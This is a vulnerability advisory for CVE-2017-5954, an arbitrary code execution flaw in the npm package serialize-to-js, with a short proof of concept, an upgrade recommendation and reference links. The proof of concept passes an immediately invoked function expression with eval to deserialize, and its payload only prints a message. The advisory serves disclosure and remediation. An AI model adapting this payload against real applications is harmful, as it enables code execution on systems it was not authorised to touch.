CRITICAL 9.8 npm
Code Execution Through IIFE in serialize-to-js
GHSA-mm62-wxc8-cf7m · CVE-2017-5954
Published · Modified
Description
Affected versions of serialize-to-js may be vulnerable to arbitrary code execution through an Immediately Invoked Function Expression (IIFE).
Proof of Concept
var payload = "{e: (function(){ eval('console.log(`exploited`)') })() }"
var serialize = require('serialize-to-js');
serialize.deserialize(payload);
Recommendation
Update to version 1.0.0, or later, and review this disclaimer from the author.
References
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2017-5954
- WEB https://github.com/commenthol/serialize-to-js/issues/1
- WEB https://github.com/commenthol/serialize-to-js/commit/1cd433960e5b9db4c0b537afb28366198a319429
- ADVISORY https://github.com/advisories/GHSA-mm62-wxc8-cf7m
- PACKAGE https://github.com/commenthol/serialize-to-js
- WEB https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution
- WEB https://www.npmjs.com/advisories/313
- WEB https://www.npmjs.com/package/serialize-to-js#deserialize
- WEB http://www.securityfocus.com/bid/96223
Ready to move
Start Securing
Free, no credit card | First findings in minutes